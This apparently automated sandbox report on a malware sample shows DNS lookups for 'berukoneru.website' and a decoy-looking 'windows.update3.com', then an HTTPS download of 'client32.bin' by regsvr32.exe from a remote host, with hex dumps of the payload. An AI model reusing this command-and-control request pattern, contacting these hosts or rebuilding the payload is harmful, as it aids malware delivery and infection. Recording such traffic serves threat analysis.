                        Dec 14, 2021 10:34:06.991794109 CET49795443192.168.2.579.110.52.144

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 14, 2021 10:33:56.145939112 CET5712853192.168.2.58.8.8.8
                        Dec 14, 2021 10:33:56.164990902 CET53571288.8.8.8192.168.2.5
                        Dec 14, 2021 10:33:56.364356041 CET5479153192.168.2.58.8.8.8
                        Dec 14, 2021 10:33:56.382654905 CET53547918.8.8.8192.168.2.5
                        Dec 14, 2021 10:33:56.425647974 CET5046353192.168.2.58.8.8.8
                        Dec 14, 2021 10:33:56.444000959 CET53504638.8.8.8192.168.2.5
                        Dec 14, 2021 10:33:56.735696077 CET5039453192.168.2.58.8.8.8
                        Dec 14, 2021 10:33:56.753909111 CET53503948.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:06.972225904 CET5734453192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:06.988746881 CET53573448.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:07.185264111 CET5445053192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:07.205163956 CET53544508.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:07.244362116 CET5926153192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:07.262615919 CET53592618.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:07.430716991 CET5715153192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:07.448971033 CET53571518.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:07.580158949 CET5941353192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:07.596787930 CET53594138.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:07.788218975 CET6051653192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:07.792956114 CET5164953192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:07.804882050 CET53605168.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:07.810184002 CET6508653192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:07.811239958 CET53516498.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:07.826984882 CET53650868.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:08.269373894 CET5643253192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:08.285397053 CET53564328.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:08.324105024 CET5292953192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:08.340738058 CET53529298.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:08.428600073 CET6431753192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:08.445041895 CET53643178.8.8.8192.168.2.5
                        Dec 14, 2021 10:34:08.793006897 CET6100453192.168.2.58.8.8.8
                        Dec 14, 2021 10:34:08.812880993 CET53610048.8.8.8192.168.2.5

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Dec 14, 2021 10:33:56.145939112 CET192.168.2.58.8.8.80xc7cStandard query (0)windows.update3.comA (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.364356041 CET192.168.2.58.8.8.80xce4aStandard query (0)windows.update3.comA (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.425647974 CET192.168.2.58.8.8.80xcd9eStandard query (0)windows.update3.comA (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.735696077 CET192.168.2.58.8.8.80x8d48Standard query (0)windows.update3.comA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:06.972225904 CET192.168.2.58.8.8.80x7b27Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.185264111 CET192.168.2.58.8.8.80x769bStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.244362116 CET192.168.2.58.8.8.80x2011Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.430716991 CET192.168.2.58.8.8.80xf508Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.580158949 CET192.168.2.58.8.8.80xfaStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.788218975 CET192.168.2.58.8.8.80x2a7cStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.792956114 CET192.168.2.58.8.8.80x714bStandard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.810184002 CET192.168.2.58.8.8.80x6f61Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:08.269373894 CET192.168.2.58.8.8.80x72a8Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:08.324105024 CET192.168.2.58.8.8.80x80a1Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:08.428600073 CET192.168.2.58.8.8.80xf677Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:08.793006897 CET192.168.2.58.8.8.80xb228Standard query (0)berukoneru.websiteA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Dec 14, 2021 10:33:56.164990902 CET8.8.8.8192.168.2.50xc7cNo error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                        Dec 14, 2021 10:33:56.164990902 CET8.8.8.8192.168.2.50xc7cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.164990902 CET8.8.8.8192.168.2.50xc7cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.164990902 CET8.8.8.8192.168.2.50xc7cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.382654905 CET8.8.8.8192.168.2.50xce4aNo error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                        Dec 14, 2021 10:33:56.382654905 CET8.8.8.8192.168.2.50xce4aNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.382654905 CET8.8.8.8192.168.2.50xce4aNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.382654905 CET8.8.8.8192.168.2.50xce4aNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.444000959 CET8.8.8.8192.168.2.50xcd9eNo error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                        Dec 14, 2021 10:33:56.444000959 CET8.8.8.8192.168.2.50xcd9eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.444000959 CET8.8.8.8192.168.2.50xcd9eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.444000959 CET8.8.8.8192.168.2.50xcd9eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.753909111 CET8.8.8.8192.168.2.50x8d48No error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                        Dec 14, 2021 10:33:56.753909111 CET8.8.8.8192.168.2.50x8d48No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.753909111 CET8.8.8.8192.168.2.50x8d48No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                        Dec 14, 2021 10:33:56.753909111 CET8.8.8.8192.168.2.50x8d48No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:06.988746881 CET8.8.8.8192.168.2.50x7b27No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.205163956 CET8.8.8.8192.168.2.50x769bNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.262615919 CET8.8.8.8192.168.2.50x2011No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.448971033 CET8.8.8.8192.168.2.50xf508No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.596787930 CET8.8.8.8192.168.2.50xfaNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.804882050 CET8.8.8.8192.168.2.50x2a7cNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.811239958 CET8.8.8.8192.168.2.50x714bNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:07.826984882 CET8.8.8.8192.168.2.50x6f61No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:08.285397053 CET8.8.8.8192.168.2.50x72a8No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:08.340738058 CET8.8.8.8192.168.2.50x80a1No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:08.445041895 CET8.8.8.8192.168.2.50xf677No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                        Dec 14, 2021 10:34:08.812880993 CET8.8.8.8192.168.2.50xb228No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • berukoneru.website

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.54979579.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:07 UTC0OUTGET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:07 UTC0INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 213639
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=qetl3urna05fer0cu0uej8os80; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:07 UTC0INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                        Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                        2021-12-14 09:34:07 UTC16INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                        Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                        2021-12-14 09:34:07 UTC32INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                        Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                        2021-12-14 09:34:07 UTC48INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                        Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                        2021-12-14 09:34:07 UTC64INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                        Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                        2021-12-14 09:34:07 UTC80INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                        Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                        2021-12-14 09:34:07 UTC96INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                        Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                        2021-12-14 09:34:07 UTC112INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                        Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                        2021-12-14 09:34:07 UTC128INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                        Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                        2021-12-14 09:34:07 UTC144INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                        Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                        2021-12-14 09:34:07 UTC160INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                        Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                        2021-12-14 09:34:07 UTC176INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
